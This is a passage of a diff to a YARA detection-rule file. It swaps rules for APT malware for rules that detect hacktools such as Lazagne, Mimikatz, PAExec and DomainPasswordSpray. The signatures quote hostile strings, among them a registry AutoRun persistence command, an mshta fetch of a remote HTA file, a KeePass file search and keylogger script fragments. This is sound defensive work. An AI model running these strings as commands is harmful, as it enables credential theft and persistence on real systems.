+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4532-L4548"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0e8bb00133a94b29c482b9785048025a62e2706f3653c1915be7b702fbfe48d6"
+		logic_hash = "5e09135e3908442d873511b7b75c8475b2345a28f3bad41a242d6fc5a3b7c002"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "15ededb19ec5ab6f03db1106d2ccdeeacacdb8cd708518d065cacb1b0d7e955d"
-
-	strings:
-		$s1 = "c:\\windows\\temp\\winrar.exe" fullword wide
-		$s2 = "info@aadobetech.com" fullword ascii
-		$s3 = "%s\\ssleay32.dll" fullword wide
-		$s4 = "%s\\libeay32.dll" fullword wide
-		$s5 = "%s\\fprot32.exe" fullword wide
-		$s6 = "ADOBE Corp.1" fullword ascii
-		$s7 = "Adobe Flash Player1\"0 " fullword ascii
-		$s8 = "Windows Index Services" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 4 of them ) or ( 6 of them )
+		( uint32( 0 ) == 0x8e859c07 or uint32( 0 ) == 0x2d859c07 or uint32( 0 ) == 0x92959c07 or uint32( 0 ) == 0x929d9c07 or uint32( 0 ) == 0x29959c07 or uint32( 0 ) == 0x2b8d9c07 or uint32( 0 ) == 0x2b859c07 or uint32( 0 ) == 0x28b59c07 ) and filesize < 2KB
 }
-rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_5 : FILE
+rule SIGNATURE_BASE_HKTL_Lazagne_Passworddumper_Dec18_1 : FILE
 {
 	meta:
-		description = "Detects PROMETHIUM and NEODYMIUM malware"
+		description = "Detects password dumper Lazagne often used by middle eastern threat groups"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4bd60f61-a595-5289-9595-a7e33f265748"
-		date = "2016-12-14"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/8abDE6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_promethium_neodymium.yar#L87-L105"
+		id = "bae48a4d-33b6-55b9-abf5-daf87e5da9e9"
+		date = "2018-12-11"
+		modified = "2025-04-14"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4550-L4570"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "69433fae4d51f7fd7b6f5b683f9c751d0f0352b8ed805a8177085e635eb26260"
-		score = 75
+		logic_hash = "887c8e91942076395dc7575d5cbd926e7e0971a759daf719983dd918d9babad3"
+		score = 85
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a8b7e3edaa18c6127e98741503c3a2a66b7720d2abd967c94b8a5f2e99575ac5"
+		hash1 = "1205f5845035e3ee30f5a1ced5500d8345246ef4900bcb4ba67ef72c0f79966c"
+		hash2 = "884e991d2066163e02472ea82d89b64e252537b28c58ad57d9d648b969de6a63"
+		hash3 = "bf8f30031769aa880cdbe22bc0be32691d9f7913af75a5b68f8426d4f0c7be50"
 
 	strings:
-		$s1 = "Winxsys.exe" fullword wide
-		$s2 = "%s\\ssleay32.dll" fullword wide
-		$s3 = "%s\\libeay32.dll" fullword wide
-		$s4 = "Windows Index Services" fullword wide
-		$s5 = "<F RAT" fullword ascii
-		$s6 = "WININDX-088FA840-B10D-11D3-BC36-006067709674" fullword wide
+		$s1 = "softwares.opera(" ascii
+		$s2 = "softwares.mozilla(" ascii
+		$s3 = "config.dico(" ascii
+		$s4 = "softwares.chrome(" ascii
+		$s5 = "softwares.outlook(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 17000KB and 1 of them
 }
-rule SIGNATURE_BASE_PROMETHIUM_NEODYMIUM_Malware_6 : FILE
+rule SIGNATURE_BASE_HKTL_Lazagne_Gen_18
 {
 	meta:
-		description = "Detects PROMETHIUM and NEODYMIUM malware"
+		description = "Detects Lazagne password extractor hacktool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0f36eb56-39d8-536c-93ff-4a2352163612"
-		date = "2016-12-14"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/8abDE6"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_promethium_neodymium.yar#L107-L125"
+		id = "034ea6d8-f5cf-5664-9ff9-24d19403093d"
+		date = "2018-12-11"
+		modified = "2025-04-14"
+		reference = "https://creativecommons.org/licenses/by-nc/4.0/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4572-L4589"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6cfccb863c3ea8f3f60520b0df03eee8e3b754699aa339fea21489d34e29f47b"
-		score = 75
+		logic_hash = "6f3e895080267a551a3b7a0ba2d4207b31befacbd35d1e6941e1b69d7e2689ce"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dbd8cbbaf59d19cf7566042945e36409cd090bc711e339d3f2ec652bc26d6a03"
+		tags = ""
+		hash1 = "51121dd5fbdfe8db7d3a5311e3e9c904d644ff7221b60284c03347938577eecf"
 
 	strings:
-		$s1 = "c:\\Windows\\system32\\syswindxr32.dll" fullword wide
-		$s2 = "c:\\windows\\temp\\TrueCrypt-7.2.exe" fullword wide
-		$s3 = "%s\\ssleay32.dll" fullword wide
-		$s4 = "%s\\libeay32.dll" fullword wide
-		$s5 = "%s\\fprot32.exe" fullword wide
-		$s6 = "Windows Index Services" fullword wide
+		$x1 = "lazagne.config.powershell_execute(" ascii
+		$x2 = "creddump7.win32." ascii
+		$x3 = "lazagne.softwares.windows.hashdump" ascii
+		$x4 = ".softwares.memory.libkeepass.common(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 7000KB and 4 of them )
+		2 of them
 }
-rule SIGNATURE_BASE_APT17_Malware_Oct17_1 : FILE
+rule SIGNATURE_BASE_HKTL_Nopowershell
 {
 	meta:
-		description = "Detects APT17 malware"
+		description = "Detects NoPowerShell hack tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "457312d8-5bfe-5282-9ace-2f169278569c"
-		date = "2017-10-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/puVc9q"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt17_mal_sep17.yar#L13-L29"
+		id = "17d508d5-833f-5232-a071-dbed8758493b"
+		date = "2018-12-28"
+		modified = "2022-12-21"
+		reference = "https://github.com/bitsadmin/nopowershell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4591-L4608"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0c4391b47df0c40dbd605515992e5eaa758d0e509e9ad24b517d104b8e7d504c"
+		logic_hash = "2207af9fcc61d547dfeff347a1eae2c59024a7270d1b8cbb7abef56d80864728"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83"
+		tags = ""
+		hash1 = "2dad091dd00625762a7590ce16c3492cbaeb756ad0e31352a42751deb7cf9e70"
 
 	strings:
-		$s1 = "\\spool\\prtprocs\\w32x86\\localspl.dll" ascii
-		$s2 = "\\spool\\prtprocs\\x64\\localspl.dll" ascii
-		$s3 = "\\msvcrt.dll" ascii
-		$s4 = "\\TSMSISrv.dll" ascii
+		$x1 = "\\NoPowerShell.pdb" ascii
+		$x2 = "Invoke-WmiMethod -Class Win32_Process -Name Create \"cmd" fullword wide
+		$x3 = "ls C:\\Windows\\System32 -Include *.exe | select -First 10 Name,Length" fullword wide
+		$x4 = "ls -Recurse -Force C:\\Users\\ -Include *.kdbx" fullword wide
+		$x5 = "NoPowerShell.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
+		1 of them
 }
-
-rule SIGNATURE_BASE_APT17_Malware_Oct17_2 : FILE
+rule SIGNATURE_BASE_HKTL_Htran_Go : FILE
 {
 	meta:
-		description = "Detects APT17 malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9f21514a-168b-5158-8322-60fa8499b11a"
-		date = "2017-10-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/puVc9q"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt17_mal_sep17.yar#L31-L59"
+		description = "Detects go based htran variant"
+		author = "Jeff Beley"
+		id = "bd9409e3-3d4c-57d6-af60-b6d6bd93d46b"
+		date = "2019-01-09"
+		modified = "2025-04-14"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4609-L4622"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "378a21edeaf36267986bd5158fe736b0970b0b9f0ad824f09dc6434a9ba1d7e2"
+		logic_hash = "444fe8ce2fdb67c982de26a10882d2cfebc4d2de6c4b4ba6ee10cf39130f1cc5"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "20cd49fd0f244944a8f5ba1d7656af3026e67d170133c1b3546c8b2de38d4f27"
+		hash1 = "4acbefb9f7907c52438ebb3070888ddc8cddfe9e3849c9d0196173a422b9035f"
 
 	strings:
-		$x1 = "Cookie: __xsptplus=%s" fullword ascii
-		$x2 = "http://services.fiveemotions.co.jp" fullword ascii
-		$x3 = "http://%s/ja-JP/2015/%d/%d/%d%d%d%d%d%d%d%d.gif" fullword ascii
-		$s1 = "FoxHTTPClient_EXE_x86.exe" fullword ascii
-		$s2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.3072" ascii
-		$s3 = "hWritePipe2 Error:%d" fullword ascii
-		$s4 = "Not Support This Function!" fullword ascii
-		$s5 = "Global\\PnP_No_Management" fullword ascii
-		$s6 = "Content-Type: image/x-png" fullword ascii
-		$s7 = "Accept-Language: ja-JP" fullword ascii
-		$s8 = "IISCMD Error:%d" fullword ascii
+		$s1 = "https://github.com/cw1997/NATBypass" fullword ascii
+		$s2 = "-slave ip1:port1 ip2:port2" fullword ascii
+		$s3 = "-tran port1 ip:port2" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.exports ( "_foo@0" ) or 1 of ( $x* ) or 6 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 7000KB and 1 of them
 }
-
-rule SIGNATURE_BASE_APT17_Unsigned_Symantec_Binary_EFA : FILE
+rule SIGNATURE_BASE_SUSP_Katz_PDB : FILE
 {
 	meta:
-		description = "Detects APT17 malware"
+		description = "Detects suspicious PDB in file"
 		author = "Florian Roth (Nextron Systems)"
-		id = "56eec517-8b00-5cb5-9806-249e50f53b99"
-		date = "2017-10-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/puVc9q"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt17_mal_sep17.yar#L61-L75"
+		id = "79f4f07c-b234-5203-a2ab-aba4a9cb9f8d"
+		date = "2019-02-04"
+		modified = "2025-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4624-L4637"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7306c8ae2be4dbf56957e11d78ba85bcfa1c8570ba41f749ea5b0e2a05e9df7b"
-		score = 75
+		logic_hash = "1a38f63d8e8baa9bc8f34c1886fc2aaea7f61d5e09792ba9cde4cf6ed8441fab"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "128aca58be325174f0220bd7ca6030e4e206b4378796e82da460055733bb6f4f"
+		hash1 = "6888ce8116c721e7b2fc3d7d594666784cf38a942808f35e309a48e536d8e305"
 
 	strings:
-		$s1 = "Copyright (c) 2007 - 2011 Symantec Corporation" fullword wide
-		$s2 = "\\\\.\\SYMEFA" fullword wide
+		$s1 = /\\Release\\[a-z]{0,8}katz.pdb/
+		$s2 = /\\Debug\\[a-z]{0,8}katz.pdb/
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them and pe.number_of_signatures == 0 )
+		uint16( 0 ) == 0x5a4d and filesize < 6000KB and all of them
 }
-
-rule SIGNATURE_BASE_APT17_Malware_Oct17_Gen : FILE
+rule SIGNATURE_BASE_HKTL_LNX_Pnscan : FILE
 {
 	meta:
-		description = "Detects APT17 malware"
+		description = "Detects Pnscan port scanner"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c2156e68-d5b5-5bd7-858c-2d5e90199287"
-		date = "2017-10-03"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/puVc9q"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt17_mal_sep17.yar#L77-L107"
+		id = "46c6c0d9-08bb-5de3-ad14-c1a7ab0542c6"
+		date = "2019-05-27"
+		modified = "2025-04-14"
+		reference = "https://github.com/ptrrkssn/pnscan"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4639-L4652"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3e0e4a989a907f5f1aaac4ba43611dd0d2e4b4fd340234f04b3fce25843f9dc6"
-		score = 75
+		logic_hash = "46a064f9df9d0a0f3fad4ec7be70b1e42074e5e117f7403d8239bc725590f268"
+		score = 55
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0375b4216334c85a4b29441a3d37e61d7797c2e1cb94b14cf6292449fb25c7b2"
-		hash2 = "07f93e49c7015b68e2542fc591ad2b4a1bc01349f79d48db67c53938ad4b525d"
-		hash3 = "ee362a8161bd442073775363bf5fa1305abac2ce39b903d63df0d7121ba60550"
 
 	strings:
-		$x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)" fullword ascii
-		$x2 = "http://%s/imgres?q=A380&hl=en-US&sa=X&biw=1440&bih=809&tbm=isus&tbnid=aLW4-J8Q1lmYBM" ascii
-		$s1 = "hWritePipe2 Error:%d" fullword ascii
-		$s2 = "Not Support This Function!" fullword ascii
-		$s3 = "Cookie: SESSIONID=%s" fullword ascii
-		$s4 = "http://0.0.0.0/1" fullword ascii
-		$s5 = "Content-Type: image/x-png" fullword ascii
-		$s6 = "Accept-Language: en-US" fullword ascii
-		$s7 = "IISCMD Error:%d" fullword ascii
-		$s8 = "[IISEND=0x%08X][Recv:] 0x%08X %s" fullword ascii
+		$x1 = "-R<hex list>   Hex coded response string to look for." fullword ascii
+		$x2 = "This program implements a multithreaded TCP port scanner." ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "414bbd566b700ea021cfae3ad8f4d9b9" or 1 of ( $x* ) or 6 of them ) )
+		filesize < 6000KB and 1 of them
 }
-rule SIGNATURE_BASE_Invoke_Mimikatz
+rule SIGNATURE_BASE_Paexec : FILE
 {
 	meta:
-		description = "Detects Invoke-Mimikatz String"
+		description = "Detects remote access tool PAEXec (like PsExec) - file PAExec.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37de51a6-e1bb-5ee7-9b7f-8fe17b3697b5"
-		date = "2016-08-03"
-		modified = "2023-12-05"
-		reference = "https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_invoke_mimikatz.yar#L10-L24"
+		id = "ee564534-b921-5639-a7ed-5da79d6bf86a"
+		date = "2017-03-27"
+		modified = "2025-04-14"
+		reference = "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4654-L4674"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b9bfa54a64d6f6b8af97ec62c9102ccf0912a19b65fbd25a4836480e63497a00"
-		score = 75
+		logic_hash = "30478d90756a9ea362c40236518fe9013e5e5683641b7e7e1ad33aa3b5587e04"
+		score = 40
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67"
+		tags = "FILE"
+		hash1 = "01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc"
 
 	strings:
-		$x2 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm" ascii
-		$x3 = "Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp" fullword ascii
+		$x1 = "Ex: -rlo C:\\Temp\\PAExec.log" fullword ascii
+		$x2 = "Can't enumProcesses - Failed to get token for Local System." fullword wide
+		$x3 = "PAExec %s - Execute Programs Remotely" fullword wide
+		$x4 = "\\\\%s\\pipe\\PAExecIn%s%u" fullword wide
+		$x5 = "\\\\.\\pipe\\PAExecIn%s%u" fullword wide
+		$x6 = "%%SystemRoot%%\\%s.exe" fullword wide
+		$x7 = "in replacement for PsExec, so the command-line usage is identical, with " fullword ascii
+		$x8 = "\\\\%s\\ADMIN$\\PAExec_Move%u.dat" fullword wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Apt_CN_Tetris_JS_Advanced_1 : FILE
+rule SIGNATURE_BASE_HKTL_Domainpasswordspray : FILE
 {
 	meta:
-		description = "Unique code from Jetriz, Swid & Jeniva of the Tetris framework"
-		author = "@imp0rtp3 (modified by Florian Roth)"
-		id = "a56f69f5-3562-52ab-9686-411019c51055"
-		date = "2020-09-06"
-		modified = "2023-12-05"
-		reference = "https://imp0rtp3.wordpress.com/2021/08/12/tetris"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tetris.yar#L2-L31"
+		description = "Detects the Powershell password spray tool DomainPasswordSpray"
+		author = "Arnim Rupp"
+		id = "890e4514-2846-54f8-8f32-cc9d2a4ef81b"
+		date = "2023-01-13"
+		modified = "2025-04-14"
+		reference = "https://github.com/dafthack/DomainPasswordSpray"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4676-L4691"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ec4ba53fea05c5331ed900b8c7da4cddd4ab64e87dfc165ac18d72d22f754d87"
-		score = 75
+		logic_hash = "aa20bf139eff36100624771fe7617c214337ae5ab2e2746143bd8e6cc1b05b4e"
+		score = 60
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "44d4c0ae5673d2a076f3b5acdc83063aca49d58e6dd7cf73d0b927f83d359247"
 
 	strings:
-		$a1 = "var a0_0x"
-		$b1 = "a0_0x" ascii
-		$cx1 = "))),function(){try{var _0x"
-		$cx2 = "=window)||void 0x0===_0x"
-		$cx3 = "){if(opener&&void 0x0!==opener["
-		$cx4 = "String['fromCharCode'](0x"
-		$e1 = "')](__p__)"
+		$s = "Invoke-DomainPasswordSpray" fullword ascii wide
 
 	condition:
-		$a1 at 0 or ( filesize < 1000KB and ( #b1 > 300 or #e1 > 1 or 2 of ( $cx* ) ) )
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Apt_CN_Tetrisplugins_JS : FILE
+rule SIGNATURE_BASE_HKTL_Rusthound : FILE
 {
 	meta:
-		description = "Code and strings of plugins from the Tetris framework loaded by Swid"
-		author = "@imp0rtp3"
-		id = "83e6fbad-55d6-5229-a17d-8929e0e658f8"
-		date = "2020-09-06"
-		modified = "2023-12-05"
-		reference = "https://imp0rtp3.wordpress.com/2021/08/12/tetris"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_tetris.yar#L34-L114"
+		description = "Detect hacktool RustHound (Sharphound clone)"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d2fd79a5-9a1a-51de-920c-61653c8b0064"
+		date = "2023-03-30"
+		modified = "2025-04-14"
+		reference = "https://github.com/OPENCYBER-FR/RustHound"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L4693-L4720"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa77d622584e79c86139b9c0f0b8ff46fc10461d0776e46c93490b6bb667afcf"
+		hash = "409f61a34d9771643246f401a9670f6f7dcced9df50cbd89a2e1a5c9ba8d03ab"
+		hash = "b1a58a9c94b1df97a243e6c3fc2d04ffd92bc802edc7d8e738573b394be331a9"
+		hash = "170f4a48911f3ebef674aade05184ea0a6b1f6b089bcffd658e95b9905423365"
+		hash = "e52f6496b863b08296bf602e92a090768e86abf498183aa5b6531a3a2d9c0bdb"
+		hash = "847e57a35df29d40858c248e5b278b09cfa89dd4201cb24262c6158395e2e585"
+		hash = "4edfed92b54d32a58b2cfc926f98a56637e89850410706abcc469a8bc846bc85"
+		hash = "feba0c16830ea0a13819a9ab8a221cc64d5a9b3cc73f3c66c405a171a2069cc1"
+		hash = "21d37c2393a6f748fe34c9d2f52693cb081b63c3a02ca0bebe4a584076f5886c"
+		hash = "874a1a186eb5808d456ce86295cd5f09d6c819375acb100573c2103608af0d84"
+		hash = "bf576bd229393010b2bb4ba17e49604109e294ca38cf19647fc7d9c325f7bcd1"
+		logic_hash = "386b734ad7f3cf02f096236c941033b3f905a3368b8a72dd63e91e6e94f12f8d"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$a3 = "(0xbb8);this['socketWatcher'](0xbb9);this["
-		$a4 = "a2869674571f77b5a0867c3d71db5856"
-		$a5 = "\\x0a\\x20\\x20var\\x20data\\x20=\\x20{}\\x0a\\x20\\x20window.c\\x20=\\x200\\x0a\\x20\\x20script2\\x20=\\x20document.createElement(\\x22script\\x22)\\x0a\\x20\\x20script2.async\\x20=\\x20true\\x0a\\x20\\x20script2.src\\x20=\\x20\\x22"
-		$a6 = "{isPluginCallback:\\x20true,\\x20data,\\x20plugin:\\x20'"
-		$a7 = "\\x20\\x22*\\x22)\\x0a\\x20\\x20}\\x0a\\x20\\x20document.documentElement.appendChild("
-		$b1 = "String(str).match(/red\">(.*?)<\\/font>/)"
-		$b2 = "['data']);}};}},{'key':'run','value':function _0x"
-		$b3 = "},{'plugin':this['plugin'],'save':!![],'type':_typeof("
-		$b4 = "Cannot\\x20call\\x20a\\x20class\\x20as\\x20a\\x20function"
-		$b5 = "The\\x20command\\x20is\\x20sent\\x20successfully,\\x20wait\\x20for\\x20the\\x20result\\x20to\\x20return"
-		$b6 = "getUserMedia\\x20is\\x20not\\x20implemented\\x20in\\x20this\\x20browser"
-		$b7 = "{'autoplay':'true'},!![]);setTimeout(function(){return $('#'+"
-		$b8 = "keyLogger($('input'));\n        keyLogger($('textarea'));"
-		$b9 = "api.loadJS(\"\".concat(api.base.baseUrl"
-		$b10 = "\"\".concat(imgUrls[i], \"?t=\""
-		$b11 = "key: \"report\",\n      value: function report(data) {\n        return this.api.callback"
-		$b12 = "that.api.base.debounce("
-		$b13 = "'className','restOfNavigator','push'"
-		$b14 = ";};'use strict';function _typeof("
-		$c1 = "/public/dependence/jquery"
-		$c2 = "'http://bn6kma5cpxill4pe.onion/static/images/tor-logo1x.png'"
-		$c3 = "'163.com not login';"
-		$c4 = "'ws://localhost:'"
-		$c5 = "function _typeof(obj) { \"@babel/helpers - typeof\"; "
-		$c6 = "'socketWatcher'"
-		$c7 = "['configurable']=!![];"
-		$c8 = "')]({'status':!![],'data':_0x"
-		$c9 = "')]={'localStorage':'localStorage'in window?window[_0x"
-		$c10 = "Browser not supported geolocation.');"
-		$c11 = "')]({'status':!![],'msg':'','data':_0x"
-		$c12 = "var Plugin = /*#__PURE__*/function () {"
-		$use_strict1 = "\"use strict\";"
-		$use_strict2 = "'use strict';"
-		$e1 = "Cannot\x20call\x20a\x20class\x20as\x20a\x20function" base64
-		$e2 = "The\x20command\x20is\x20sent\x20successfully,\x20wait\x20for\x20the\x20result\x20to\x20return" base64
-		$e3 = "getUserMedia\x20is\x20not\x20implemented\x20in\x20this\x20browser" base64
-		$e4 = "http://bn6kma5cpxill4pe.onion/static/images/tor-logo1x.png" base64
-		$e5 = "/public/dependence/jquery" base64
-		$e6 = "\x20\x22*\x22)\x0a\x20\x20}\x0a\x20\x20document.documentElement.appendChild(" base64
-		$e8 = "\x0a\x20\x20var\x20data\x20=\x20{}\x0a\x20\x20window.c\x20=\x200\x0a\x20\x20script2\x20=\x20document.createElement(\x22script\x22)\x0a\x20\x20script2.async\x20=\x20true\x0a\x20\x20script2.src\x20=\x20\x22" base64
-		$e9 = "{isPluginCallback:\x20true,\x20data,\x20plugin:\x20" base64
+		$rh1 = "rusthound" fullword ascii wide
+		$rh2 = "Making json/zip files finished!" ascii wide
 
 	condition:
-		filesize < 1000000 and ( any of ( $a* ) or 2 of ( $b* ) or 4 of ( $c* ) or 2 of ( $e* ) or ( any of ( $use_strict* ) and ( ( any of ( $b* ) and 2 of ( $c* ) ) or any of ( $e* ) ) ) )
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0x457f ) and 1 of ( $rh* )
 }
-
-rule SIGNATURE_BASE_MAL_PE_Type_Babyshark_Loader : FILE
+rule SIGNATURE_BASE_Keylogger_CN_APT : FILE
 {
 	meta:
-		description = "Detects PE Type babyShark loader mentioned in February 2019 blog post by PaloAltNetworks"
+		description = "Keylogger - generic rule for a Chinese variant"
 		author = "Florian Roth (Nextron Systems)"
-		id = "141e7a67-7930-5fd8-ac91-5d31b99e4ff3"
-		date = "2019-02-24"
+		id = "7be0b175-05a4-5725-ba21-9438c0fcd740"
+		date = "2016-03-07"
 		modified = "2023-12-05"
-		reference = "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_babyshark.yar#L4-L27"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_keylogger_cn.yar#L8-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0ab9a30cb731922d965a9cf58094fea36d5c74b9989324efee603808591ea6a5"
+		hash = "3efb3b5be39489f19d83af869f11a8ef8e9a09c3c7c0ad84da31fc45afcf06e7"
+		logic_hash = "a5330d15ad7199212cec44ade401c224c40a468650abbc7bf282b26a21cdc22b"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		hash1 = "6f76a8e16908ba2d576cf0e8cdb70114dcb70e0f7223be10aab3a728dc65c41c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\" /v AutoRun /t REG_SZ /d \"%s\" /f" fullword ascii
-		$x2 = /mshta\.exe http:\/\/[a-z0-9\.\/]{5,30}\.hta/
-		$xc1 = { 57 69 6E 45 78 65 63 00 6B 65 72 6E 65 6C 33 32
-               2E 44 4C 4C 00 00 00 00 }
